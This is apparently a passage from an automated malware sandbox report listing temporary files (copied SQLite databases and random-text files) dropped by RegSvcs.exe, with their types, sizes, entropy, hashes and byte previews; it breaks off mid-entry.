C:\Users\user\AppData\Local\Temp\tmp7AFB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7B0C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7B0D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp7B5B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\Temp\tmp7B6C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\Temp\tmp7B6D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\tmp7B6E.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\Temp\tmp7B7E.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\Temp\tmp7B7F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\Temp\tmp7B80.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\tmp7B81.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\Temp\tmpB131.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB142.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB1C0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB1F0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
